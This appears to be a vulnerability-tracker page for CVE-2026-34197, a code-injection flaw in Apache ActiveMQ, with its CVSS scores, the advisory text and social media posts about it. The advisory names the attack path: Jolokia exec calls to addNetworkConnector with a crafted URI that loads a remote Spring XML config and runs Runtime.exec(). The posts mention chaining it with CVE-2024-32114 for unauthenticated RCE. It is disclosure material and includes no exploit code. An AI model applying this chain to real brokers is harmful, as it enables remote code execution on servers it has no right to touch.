- Description
- Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue
- Source
- security@apache.org
- NVD status
- Undergoing Analysis
CVSS 3.1
- Type
- Secondary
- Base score
- 8.8
- Impact score
- 5.9
- Exploitability score
- 2.8
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- Severity
- HIGH
- security@apache.org
- CWE-20
Hype score is a measure of social media activity compared against trending CVEs from the past 12 months. Max score 100.
- Hype score
10
A 13-year-old flaw in Apache ActiveMQ can lead to RCE. CVE-2026-34197 lets attackers run OS commands via the Jolokia API. Chained with CVE-2024-32114, it becomes unauthenticated RCE on some versions. Patched in 5.19.4 and 6.2.3. ๐ Learn more โ https://t.co/f6HCobOTBr http
@TheHackersNews
10 Apr 2026
5594 Impressions
16 Retweets
32 Likes
4 Bookmarks
2 Replies
2 Quotes
Apache ActiveMQ CVE-2026-34197 allows RCE via Jolokia API by forcing brokers to load attacker-controlled remote Spring configs, becoming unauthenticated RCE on versions 6.0.0โ6.1.1 due to CVE-2024-32114. https://t.co/HGn5MYE7bF
@VivekIntel
8 Apr 2026
89 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
โ ๏ธ **Vulnerability Alert:** Apache ActiveMQ Classic โ Jolokia JMX RCE chain (CVE-2026-34197) and related auth bypass (CVE-2024-32114) ๐ **Timeline:** Disclosure: 2024-05-02; 2026-04-07, Patch: 2024-05-02; 2026-04-07 ๐ **CVE-2026-34197** | ๐ CVSS: 8.8 (HIGH ๐ ) |
@syedaquib77
8 Apr 2026
58 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
โ ๏ธ **Vulnerability Alert:** Apache ActiveMQ โ Consolidated RCE and Jolokia/OpenWire/Fileserver issues (CVE-2026-34197 + CVE-2024-32114 + CVE-2022-41678 + CVE-2023-46604 + CVE-2016-3088) ๐ **Timeline:** Disclosure: 2026-04-07, Patch: unknown ๐ **CVE-2026-34197** |
@syedaquib77
7 Apr 2026
64 Impressions
0 Retweets
1 Like
0 Bookmarks
0 Replies
0 Quotes